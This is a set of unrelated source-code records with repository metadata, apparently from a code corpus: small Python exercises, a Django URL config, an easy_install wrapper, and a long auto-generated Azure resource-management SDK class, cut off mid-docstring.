            child_name = free_name
            free_name = TreeConverter.to_nx_graph(subtree, G, child_name)
            # The edge displays the character read on this transition.
            G.add_edge(name, child_name, label=T.root[1])

        return free_name
| [
"noreply@github.com"
] | noreply@github.com |
0c43fc267f1d0b224ff7fc63b37eaf73652c3cda | e8202ff4594f8d4f9834d6be165b39a8fc3d437d | /week8/codingbat/7_string2/3.py | 4f2b097ffc034151fec43c30df85d827dfb38eb6 | [] | no_license | as1k/webdev-labs | 93e939999f38520fc701e245341fee13dfdd8cb2 | 393bf4ffdae8d60640a54efabce62db4ba76eeb8 | refs/heads/master | 2022-04-14T15:38:15.033878 | 2020-04-16T22:12:17 | 2020-04-16T22:12:17 | 237,159,602 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 62 | py | def cat_dog(str):
return str.count("cat")==str.count("dog")
| [
"nurmukhambet.ak@gmail.com"
] | nurmukhambet.ak@gmail.com |
3c4a77994e80ffff18910f6c7b8dabd80beaa432 | 5001bcd36f75203956c424eaff0ac135db7e9b5a | /lesson-2/example01.py | 431cd11fcabeb4cec48ab25a1978fccdc8a73710 | [] | no_license | Andrey-Sherenkov/python_training | cf6d637df1b191761820a62b7c0b8a991f7be815 | f776d0c623e2ecb85bacb27baf3f7fa4c61bd658 | refs/heads/main | 2023-09-03T20:27:07.601982 | 2021-11-05T15:20:57 | 2021-11-05T15:20:57 | 415,219,654 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 595 | py | # 1. Создать список и заполнить его элементами различных типов данных.
# Implement a script that checks the data type of each element, using the
# built-in type() function for the check. The list elements are specified
# explicitly in the program instead of being requested from the user.
list_of_values = [1, 2, 2.1, 'text', None]

print(list_of_values)

# Report every element together with its runtime type.
for item in list_of_values:
    print(item, type(item))
| [
"andrejjag23@mail.ru"
] | andrejjag23@mail.ru |
76ae977ac197588171decab53690a43a1b0da206 | 6f52fdaabac2275bd2f9598b891ad82214f1f7c7 | /venv/bin/easy_install | b30eb10755a0b5b290d80251088b23c7b6bae279 | [] | no_license | Mone-Lee/python-webapp | 75f2340f1b59bd0203fd68b6f3a95bbaba69760d | db0aa3da26bb432aa8770917d9a7233381248e00 | refs/heads/master | 2023-05-31T14:29:18.879083 | 2021-06-08T06:56:35 | 2021-06-08T06:56:35 | 353,957,737 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 280 | #!/Users/lee/Documents/project/python/python-webapp/venv/bin/python3
# -*- coding: utf-8 -*-
# Console-script wrapper for this virtualenv's ``easy_install`` command: it
# hands control straight to setuptools' easy_install entry point.
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
    # Drop a trailing '-script.pyw' or '.exe' suffix from argv[0]; the
    # optional group also matches an empty suffix, leaving other names
    # untouched.
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    # Run easy_install and exit with its return code.
    sys.exit(main())
| [
"1051933474@qq.com"
] | 1051933474@qq.com | |
9c1fdfa1cf187a7a17c2c72acdf43883bcf11dce | 78d7e2b47418afe873db61c77241a0094f3bcab0 | /circulante/circulante/urls.py | b23e2db39021a3b02652ff6eaa6c245e2b10d698 | [] | no_license | Rodrigo-Ornellas/circulante | f239aeefc78c804a3a2e607ae85cbcb99a64cde9 | 4a2e2813a927a5e1a05c3784e5c9c412b441fe7f | refs/heads/master | 2021-01-15T17:42:11.283401 | 2012-05-09T01:52:04 | 2012-05-09T01:52:04 | 4,059,306 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 771 | py | from django.conf.urls import patterns, include, url
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
# Discover and register every app's admin.py with the admin site.
admin.autodiscover()

# URL configuration (legacy Django 1.x patterns() style).
# NOTE(review): patterns() was removed in Django 1.10 — presumably this
# project pins an older Django; confirm before upgrading.
urlpatterns = patterns('',
    # Examples:
    # url(r'^$', 'circulante.views.home', name='home'),
    # url(r'^circulante/', include('circulante.foo.urls')),
    url(r'^cat/', include('circulante.catalogo.urls')),

    # Uncomment the admin/doc line below to enable admin documentation:
    url(r'^admin/doc/', include('django.contrib.admindocs.urls')),

    # Uncomment the next line to enable the admin:
    url(r'^admin/', include(admin.site.urls)),

    # Django-Registration:
    url(r'^contas/', include('registration.backends.default.urls')),

    # Catch-all: route everything else to the catalog app (kept last so the
    # more specific prefixes above win).
    url(r'^', include('circulante.catalogo.urls')),
)
| [
"rodrigo.ornellas@mail.com"
] | rodrigo.ornellas@mail.com |
30fc99c1e299f230a6679c3c4150367665d667e7 | 30736dab9d8e682e5603d4803349144a5f6a84fb | /sdk/resources/azure-mgmt-resource/azure/mgmt/resource/resources/v2019_08_01/operations/_resources_operations.py | 2532fbe114047a2aa4df6e55706d0512029e99c1 | [
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | montgomp/azure-sdk-for-python | 6fcaffc59f4321852aa71109691e94ad38c66464 | 0ffb0b0de095b97cbc5b69309bbce0a3b91d3eb4 | refs/heads/master | 2020-12-06T11:08:01.683369 | 2020-01-07T23:24:42 | 2020-01-07T23:24:42 | 232,445,563 | 1 | 0 | MIT | 2020-01-08T00:45:33 | 2020-01-08T00:45:33 | null | UTF-8 | Python | false | false | 64,532 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class ResourcesOperations(object):
"""ResourcesOperations operations.
You should not instantiate directly this class, but create a Client instance that will create it for you and attach it as attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: The API version to use for this operation. Constant value: "2019-08-01".
"""
models = models
    def __init__(self, client, config, serializer, deserializer):
        # Thin operation-group wrapper; all collaborators are injected by
        # the generated service client that owns this instance.
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        # Fixed API version stamped on every request built by this class.
        self.api_version = "2019-08-01"

        self.config = config
    def list_by_resource_group(
            self, resource_group_name, filter=None, expand=None, top=None, custom_headers=None, raw=False, **operation_config):
        """Get all the resources for a resource group.

        :param resource_group_name: The resource group with the resources to
         get.
        :type resource_group_name: str
        :param filter: The filter to apply on the operation.<br><br>The
         properties you can use for eq (equals) or ne (not equals) are:
         location, resourceType, name, resourceGroup, identity,
         identity/principalId, plan, plan/publisher, plan/product, plan/name,
         plan/version, and plan/promotionCode.<br><br>For example, to filter by
         a resource type, use: $filter=resourceType eq
         'Microsoft.Network/virtualNetworks'<br><br>You can use
         substringof(value, property) in the filter. The properties you can use
         for substring are: name and resourceGroup.<br><br>For example, to get
         all resources with 'demo' anywhere in the name, use:
         $filter=substringof('demo', name)<br><br>You can link more than one
         substringof together by adding and/or operators.<br><br>You can filter
         by tag names and values. For example, to filter for a tag name and
         value, use $filter=tagName eq 'tag1' and tagValue eq 'Value1'. When
         you filter by a tag name and value, the tags for each resource are not
         returned in the results.<br><br>You can use some properties together
         when filtering. The combinations you can use are: substringof and/or
         resourceType, plan and plan/publisher and plan/name, identity and
         identity/principalId.
        :type filter: str
        :param expand: The $expand query parameter. You can expand createdTime
         and changedTime. For example, to expand both properties, use
         $expand=changedTime,createdTime
        :type expand: str
        :param top: The number of results to return. If null is passed,
         returns all resources.
        :type top: int
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of GenericResource
        :rtype:
         ~azure.mgmt.resource.resources.v2019_08_01.models.GenericResourcePaged[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        def prepare_request(next_link=None):
            # next_link, when set, is the fully-formed URL for the next page
            # returned by the service, so no query parameters are re-added.
            if not next_link:
                # Construct URL
                url = self.list_by_resource_group.metadata['url']
                path_format_arguments = {
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
                }
                url = self._client.format_url(url, **path_format_arguments)

                # Construct parameters
                query_parameters = {}
                if filter is not None:
                    query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
                if expand is not None:
                    query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
                if top is not None:
                    query_parameters['$top'] = self._serialize.query("top", top, 'int')
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

            else:
                url = next_link
                query_parameters = {}

            # Construct headers
            header_parameters = {}
            header_parameters['Accept'] = 'application/json'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

            # Construct and send request
            request = self._client.get(url, query_parameters, header_parameters)
            return request

        def internal_paging(next_link=None):
            # Callback invoked lazily by the paged iterator for each page.
            request = prepare_request(next_link)

            response = self._client.send(request, stream=False, **operation_config)

            if response.status_code not in [200]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp

            return response

        # Deserialize response
        header_dict = None
        if raw:
            header_dict = {}
        deserialized = models.GenericResourcePaged(internal_paging, self._deserialize.dependencies, header_dict)

        return deserialized
    list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/resources'}
    def _move_resources_initial(
            self, source_resource_group_name, resources=None, target_resource_group=None, custom_headers=None, raw=False, **operation_config):
        """Send the initial POST for the moveResources long-running operation.

        Internal helper behind :meth:`move_resources`. The service accepts
        the request with 202 (in progress) or 204 (completed); any other
        status raises :class:`CloudError`. Returns a ClientRawResponse only
        when ``raw`` is True, otherwise ``None``.
        """
        parameters = models.ResourcesMoveInfo(resources=resources, target_resource_group=target_resource_group)

        # Construct URL
        url = self.move_resources.metadata['url']
        path_format_arguments = {
            'sourceResourceGroupName': self._serialize.url("source_resource_group_name", source_resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(parameters, 'ResourcesMoveInfo')

        # Construct and send request
        request = self._client.post(url, query_parameters, header_parameters, body_content)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [202, 204]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response
    def move_resources(
            self, source_resource_group_name, resources=None, target_resource_group=None, custom_headers=None, raw=False, polling=True, **operation_config):
        """Moves resources from one resource group to another resource group.

        The resources to move must be in the same source resource group. The
        target resource group may be in a different subscription. When moving
        resources, both the source group and the target group are locked for
        the duration of the operation. Write and delete operations are blocked
        on the groups until the move completes. .

        :param source_resource_group_name: The name of the resource group
         containing the resources to move.
        :type source_resource_group_name: str
        :param resources: The IDs of the resources.
        :type resources: list[str]
        :param target_resource_group: The target resource group.
        :type target_resource_group: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns None or
         ClientRawResponse<None> if raw==True
        :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Kick off the operation; raw=True so the poller receives the
        # undeserialized initial response (with its polling headers).
        raw_result = self._move_resources_initial(
            source_resource_group_name=source_resource_group_name,
            resources=resources,
            target_resource_group=target_resource_group,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            # Operation has no body; surface the raw response only on request.
            if raw:
                client_raw_response = ClientRawResponse(None, response)
                return client_raw_response

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        # polling: True -> default ARM polling, False -> fire-and-return,
        # anything else -> caller-supplied polling strategy object.
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    move_resources.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{sourceResourceGroupName}/moveResources'}
    def _validate_move_resources_initial(
            self, source_resource_group_name, resources=None, target_resource_group=None, custom_headers=None, raw=False, **operation_config):
        """Send the initial POST for the validateMoveResources operation.

        Internal helper behind :meth:`validate_move_resources`. Accepts 202
        (validation in progress) or 204 (validation succeeded); any other
        status raises :class:`CloudError`. Returns a ClientRawResponse only
        when ``raw`` is True, otherwise ``None``.
        """
        parameters = models.ResourcesMoveInfo(resources=resources, target_resource_group=target_resource_group)

        # Construct URL
        url = self.validate_move_resources.metadata['url']
        path_format_arguments = {
            'sourceResourceGroupName': self._serialize.url("source_resource_group_name", source_resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(parameters, 'ResourcesMoveInfo')

        # Construct and send request
        request = self._client.post(url, query_parameters, header_parameters, body_content)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [202, 204]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response
    def validate_move_resources(
            self, source_resource_group_name, resources=None, target_resource_group=None, custom_headers=None, raw=False, polling=True, **operation_config):
        """Validates whether resources can be moved from one resource group to
        another resource group.

        This operation checks whether the specified resources can be moved to
        the target. The resources to move must be in the same source resource
        group. The target resource group may be in a different subscription. If
        validation succeeds, it returns HTTP response code 204 (no content). If
        validation fails, it returns HTTP response code 409 (Conflict) with an
        error message. Retrieve the URL in the Location header value to check
        the result of the long-running operation.

        :param source_resource_group_name: The name of the resource group
         containing the resources to validate for move.
        :type source_resource_group_name: str
        :param resources: The IDs of the resources.
        :type resources: list[str]
        :param target_resource_group: The target resource group.
        :type target_resource_group: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns None or
         ClientRawResponse<None> if raw==True
        :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Kick off the operation; raw=True so the poller receives the
        # undeserialized initial response (with its polling headers).
        raw_result = self._validate_move_resources_initial(
            source_resource_group_name=source_resource_group_name,
            resources=resources,
            target_resource_group=target_resource_group,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            # Validation produces no body; surface raw response on request.
            if raw:
                client_raw_response = ClientRawResponse(None, response)
                return client_raw_response

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        # polling: True -> default ARM polling, False -> fire-and-return,
        # anything else -> caller-supplied polling strategy object.
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    validate_move_resources.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{sourceResourceGroupName}/validateMoveResources'}
    def list(
            self, filter=None, expand=None, top=None, custom_headers=None, raw=False, **operation_config):
        """Get all the resources in a subscription.

        :param filter: The filter to apply on the operation.<br><br>The
         properties you can use for eq (equals) or ne (not equals) are:
         location, resourceType, name, resourceGroup, identity,
         identity/principalId, plan, plan/publisher, plan/product, plan/name,
         plan/version, and plan/promotionCode.<br><br>For example, to filter by
         a resource type, use: $filter=resourceType eq
         'Microsoft.Network/virtualNetworks'<br><br>You can use
         substringof(value, property) in the filter. The properties you can use
         for substring are: name and resourceGroup.<br><br>For example, to get
         all resources with 'demo' anywhere in the name, use:
         $filter=substringof('demo', name)<br><br>You can link more than one
         substringof together by adding and/or operators.<br><br>You can filter
         by tag names and values. For example, to filter for a tag name and
         value, use $filter=tagName eq 'tag1' and tagValue eq 'Value1'. When
         you filter by a tag name and value, the tags for each resource are not
         returned in the results.<br><br>You can use some properties together
         when filtering. The combinations you can use are: substringof and/or
         resourceType, plan and plan/publisher and plan/name, identity and
         identity/principalId.
        :type filter: str
        :param expand: The $expand query parameter. You can expand createdTime
         and changedTime. For example, to expand both properties, use
         $expand=changedTime,createdTime
        :type expand: str
        :param top: The number of results to return. If null is passed,
         returns all resource groups.
        :type top: int
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of GenericResource
        :rtype:
         ~azure.mgmt.resource.resources.v2019_08_01.models.GenericResourcePaged[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        def prepare_request(next_link=None):
            # next_link, when set, is the fully-formed URL for the next page
            # returned by the service, so no query parameters are re-added.
            if not next_link:
                # Construct URL
                url = self.list.metadata['url']
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
                }
                url = self._client.format_url(url, **path_format_arguments)

                # Construct parameters
                query_parameters = {}
                if filter is not None:
                    query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
                if expand is not None:
                    query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
                if top is not None:
                    query_parameters['$top'] = self._serialize.query("top", top, 'int')
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

            else:
                url = next_link
                query_parameters = {}

            # Construct headers
            header_parameters = {}
            header_parameters['Accept'] = 'application/json'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

            # Construct and send request
            request = self._client.get(url, query_parameters, header_parameters)
            return request

        def internal_paging(next_link=None):
            # Callback invoked lazily by the paged iterator for each page.
            request = prepare_request(next_link)

            response = self._client.send(request, stream=False, **operation_config)

            if response.status_code not in [200]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp

            return response

        # Deserialize response
        header_dict = None
        if raw:
            header_dict = {}
        deserialized = models.GenericResourcePaged(internal_paging, self._deserialize.dependencies, header_dict)

        return deserialized
    list.metadata = {'url': '/subscriptions/{subscriptionId}/resources'}
    def check_existence(
            self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, custom_headers=None, raw=False, **operation_config):
        """Checks whether a resource exists.

        :param resource_group_name: The name of the resource group containing
         the resource to check. The name is case insensitive.
        :type resource_group_name: str
        :param resource_provider_namespace: The resource provider of the
         resource to check.
        :type resource_provider_namespace: str
        :param parent_resource_path: The parent resource identity.
        :type parent_resource_path: str
        :param resource_type: The resource type.
        :type resource_type: str
        :param resource_name: The name of the resource to check whether it
         exists.
        :type resource_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: bool or ClientRawResponse if raw=true
        :rtype: bool or ~msrest.pipeline.ClientRawResponse
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = self.check_existence.metadata['url']
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str'),
            'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
            'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
            'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request (HEAD: no body either way)
        request = self._client.head(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        # 204 and 404 are both expected answers here; anything else is an error.
        if response.status_code not in [204, 404]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        # 204 -> the resource exists, 404 -> it does not.
        deserialized = (response.status_code == 204)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    check_existence.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}'}
    def _delete_initial(
            self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, custom_headers=None, raw=False, **operation_config):
        """Send the initial DELETE for the resource-delete operation.

        Internal helper behind :meth:`delete`. Accepts 200/202 (deletion
        started) or 204 (already gone); any other status raises
        :class:`CloudError`. Returns a ClientRawResponse only when ``raw``
        is True, otherwise ``None``.
        """
        # Construct URL
        url = self.delete.metadata['url']
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str'),
            'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
            'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
            'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.delete(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 202, 204]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response
    def delete(
            self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, custom_headers=None, raw=False, polling=True, **operation_config):
        """Deletes a resource.

        :param resource_group_name: The name of the resource group that
         contains the resource to delete. The name is case insensitive.
        :type resource_group_name: str
        :param resource_provider_namespace: The namespace of the resource
         provider.
        :type resource_provider_namespace: str
        :param parent_resource_path: The parent resource identity.
        :type parent_resource_path: str
        :param resource_type: The resource type.
        :type resource_type: str
        :param resource_name: The name of the resource to delete.
        :type resource_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns None or
         ClientRawResponse<None> if raw==True
        :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Kick off the operation; raw=True so the poller receives the
        # undeserialized initial response (with its polling headers).
        raw_result = self._delete_initial(
            resource_group_name=resource_group_name,
            resource_provider_namespace=resource_provider_namespace,
            parent_resource_path=parent_resource_path,
            resource_type=resource_type,
            resource_name=resource_name,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            # Delete has no body; surface the raw response only on request.
            if raw:
                client_raw_response = ClientRawResponse(None, response)
                return client_raw_response

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        # polling: True -> default ARM polling, False -> fire-and-return,
        # anything else -> caller-supplied polling strategy object.
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{parentResourcePath}/{resourceType}/{resourceName}'}
    def _create_or_update_initial(
            self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, parameters, custom_headers=None, raw=False, **operation_config):
        """Send the initial PUT for the create-or-update operation.

        Internal helper behind :meth:`create_or_update`. A 200/201 response
        carries a GenericResource body that is deserialized here; a 202
        response has no body (operation still running). Any other status
        raises :class:`CloudError`.
        """
        # Construct URL
        url = self.create_or_update.metadata['url']
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'resourceProviderNamespace': self._serialize.url("resource_provider_namespace", resource_provider_namespace, 'str'),
            'parentResourcePath': self._serialize.url("parent_resource_path", parent_resource_path, 'str', skip_quote=True),
            'resourceType': self._serialize.url("resource_type", resource_type, 'str', skip_quote=True),
            'resourceName': self._serialize.url("resource_name", resource_name, 'str'),
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(parameters, 'GenericResource')

        # Construct and send request
        request = self._client.put(url, query_parameters, header_parameters, body_content)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 201, 202]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('GenericResource', response)
        if response.status_code == 201:
            deserialized = self._deserialize('GenericResource', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    def create_or_update(
            self, resource_group_name, resource_provider_namespace, parent_resource_path, resource_type, resource_name, parameters, custom_headers=None, raw=False, polling=True, **operation_config):
        """Creates a resource.

        :param resource_group_name: The name of the resource group for the
         resource. The name is case insensitive.
        :type resource_group_name: str
        :param resource_provider_namespace: The namespace of the resource
         provider.
        :type resource_provider_namespace: str
        :param parent_resource_path: The parent resource identity.
        :type parent_resource_path: str
        :param resource_type: The resource type of the resource to create.
        :type resource_type: str
        :param resource_name: The name of the resource to create.
        :type resource_name: str
        :param parameters: Parameters for creating or updating the resource.
        :type parameters:
         ~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
